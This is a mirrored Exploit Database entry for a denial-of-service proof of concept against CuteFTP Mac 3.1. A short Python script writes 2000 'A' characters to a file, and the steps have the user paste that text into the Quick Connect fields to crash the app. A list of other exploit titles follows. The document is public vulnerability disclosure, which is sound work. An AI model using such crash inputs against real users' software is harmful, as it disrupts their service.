CuteFTP Mac 3.1 – Denial of Service (PoC)

Exploit Database
14 阅读

作者： Yair Rodríguez Aparicio

日期： 2018-11-13
类别：
- dos
平台：
- macos
来源：https://www.exploit-db.com/exploits/45823/

# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
# Date: 2018-11-06
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: http://go.globalscape.com/download/cuteftp-macosx
# Version: 3.1
# Tested on: macOS High Sierra 10.13

# Steps to Produce the Crash:
# 1.- Run python code : python cute.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open CuteFTP Mac
# 4.- Clic on "Quick Connect"
# 4.- Paste clipboard on "Host", "User", "Password" and "Port"
# 5.- click on "Run"
# 6.- Crashed!



buffer = "\x41" * 2000
f = open("text.txt", "w")
f.write(buffer)
f.close()

last Exploits
CuteFTP Mac 3.1 – Denial of Service (PoC)的更多信息

Internet Explorer – Use-After-Free in JScript Arguments During toJSON Callback：
NVIDIA Driver – Incorrect Bounds Check in Escape 0x70001b2：
Samsung – ‘m2m1shot’ Kernel Driver Buffer Overflow：
Novell ZENworks 10/11 – TFTPD Remote Code Execution：
ConQuest DICOM Server 1.4.17d – Stack Buffer (PoC)：
Xlight FTP Server 3.7 – Remote Buffer Overflow：
Xilisoft BlackBerry Ring Tone Maker – ‘.wma’ Local Crash：
EasyFTP Server 1.7.0.2 – (Authenticated) Buffer Overflow (SEH) (PoC)：